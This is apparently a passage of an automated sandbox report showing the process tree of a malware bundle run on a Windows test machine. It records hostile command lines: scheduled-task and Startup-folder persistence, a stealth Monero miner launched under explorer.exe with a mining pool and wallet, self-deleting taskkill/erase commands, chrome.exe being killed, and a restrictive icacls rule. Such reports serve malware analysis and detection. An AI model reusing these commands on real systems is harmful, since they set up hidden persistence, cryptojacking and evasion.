- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:2732 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:1272
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2244
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2312
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2964
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2224
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2680
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2780 -
C:\Users\Admin\AppData\Roaming\6395256.exe"C:\Users\Admin\AppData\Roaming\6395256.exe"8⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1960
-
-
C:\Users\Admin\AppData\Roaming\1827316.exe"C:\Users\Admin\AppData\Roaming\1827316.exe"8⤵
- Executes dropped EXE
PID:1700
-
-
C:\Users\Admin\AppData\Roaming\5009993.exe"C:\Users\Admin\AppData\Roaming\5009993.exe"8⤵PID:1524
-
-
C:\Users\Admin\AppData\Roaming\3195003.exe"C:\Users\Admin\AppData\Roaming\3195003.exe"8⤵PID:2712
-
-
C:\Users\Admin\AppData\Roaming\6468569.exe"C:\Users\Admin\AppData\Roaming\6468569.exe"8⤵PID:2232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 14969⤵
- Program crash
PID:2424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 13848⤵
- Program crash
PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2844 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2844 -s 13928⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2892 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\is-7E9N3.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-7E9N3.tmp\setup_2.tmp" /SL5="$80174,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\is-PE9S4.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-PE9S4.tmp\setup_2.tmp" /SL5="$20184,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\is-1B1MI.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-1B1MI.tmp\postback.exe" ss111⤵PID:3036
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\w8mz2VKct.exe"C:\Users\Admin\AppData\Local\Temp\w8mz2VKct.exe"13⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"14⤵PID:2452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\15⤵PID:2736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\16⤵PID:2236
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F15⤵
- Creates scheduled task(s)
PID:2056
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:1520
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global5⤵PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe4⤵
- Loads dropped DLL
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue11b9d76a96506.exeTue11b9d76a96506.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:628 -
C:\Users\Admin\AppData\Local\Temp\is-UHDUB.tmp\Tue11b9d76a96506.tmp"C:\Users\Admin\AppData\Local\Temp\is-UHDUB.tmp\Tue11b9d76a96506.tmp" /SL5="$40138,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue11b9d76a96506.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:348 -
C:\Users\Admin\AppData\Local\Temp\is-804H1.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-804H1.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2268 -
C:\Program Files\Mozilla Firefox\KTHCZPVLMP\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\KTHCZPVLMP\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\is-LP3DD.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-LP3DD.tmp\ultramediaburner.tmp" /SL5="$1021A,281924,62464,C:\Program Files\Mozilla Firefox\KTHCZPVLMP\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2400 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:2928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\59-ffd6a-a99-c9691-d5e6485d83b9a\Kagymaelaehae.exe"C:\Users\Admin\AppData\Local\Temp\59-ffd6a-a99-c9691-d5e6485d83b9a\Kagymaelaehae.exe"8⤵
- Executes dropped EXE
PID:2376 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Executes dropped EXE
PID:1520 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1520 CREDAT:275457 /prefetch:210⤵PID:628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\97-4fcba-417-af9b1-1048c2c4e4809\Gorasyxute.exe"C:\Users\Admin\AppData\Local\Temp\97-4fcba-417-af9b1-1048c2c4e4809\Gorasyxute.exe"8⤵
- Executes dropped EXE
PID:2788
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone4⤵
- Loads dropped DLL
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue1109eec571ac.exeTue1109eec571ac.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue1109eec571ac.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue1109eec571ac.exe" & exit6⤵PID:2152
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue1109eec571ac.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe4⤵
- Loads dropped DLL
PID:828 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue11bc0507b56295.exeTue11bc0507b56295.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe4⤵PID:1464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue118f55232e4.exe4⤵
- Loads dropped DLL
PID:1060 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue118f55232e4.exeTue118f55232e4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2588
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe4⤵
- Loads dropped DLL
PID:760 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue11141271fbe5877f.exeTue11141271fbe5877f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\ProgramData\4701498.exe"C:\ProgramData\4701498.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2316 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2316 -s 15887⤵
- Program crash
PID:1548
-
-
-
C:\ProgramData\5855277.exe"C:\ProgramData\5855277.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2388 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:1608
-
-
-
C:\ProgramData\2234051.exe"C:\ProgramData\2234051.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 18047⤵
- Program crash
PID:2764
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe4⤵
- Loads dropped DLL
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue112c483dd3245d.exeTue112c483dd3245d.exe5⤵
- Executes dropped EXE
PID:324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Tue112c483dd3245d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue112c483dd3245d.exe" & del C:\ProgramData\*.dll & exit6⤵PID:2524
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Tue112c483dd3245d.exe /f7⤵
- Kills process with taskkill
PID:3048
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:580
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2112 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2124
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1092208015-1932624259-516511570-113545420489190648210614359551222327944182291079"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2460
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1208
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-420951441-389903472176714482580641914-1043964411-10368772579432488761335462124"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
C:\Windows\system32\taskeng.exetaskeng.exe {B40DF1CC-2562-4EFC-9132-C9C368D088EF} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵PID:664
-
-
C:\Users\Admin\AppData\Local\Temp\5B2B.exeC:\Users\Admin\AppData\Local\Temp\5B2B.exe1⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\CA14.exeC:\Users\Admin\AppData\Local\Temp\CA14.exe1⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\167F.exeC:\Users\Admin\AppData\Local\Temp\167F.exe1⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\167F.exeC:\Users\Admin\AppData\Local\Temp\167F.exe2⤵PID:1932
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\aff49bab-1448-49e6-b523-3ff8f2bec38d" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\167F.exe"C:\Users\Admin\AppData\Local\Temp\167F.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\167F.exe"C:\Users\Admin\AppData\Local\Temp\167F.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A844.exeC:\Users\Admin\AppData\Local\Temp\A844.exe1⤵PID:1884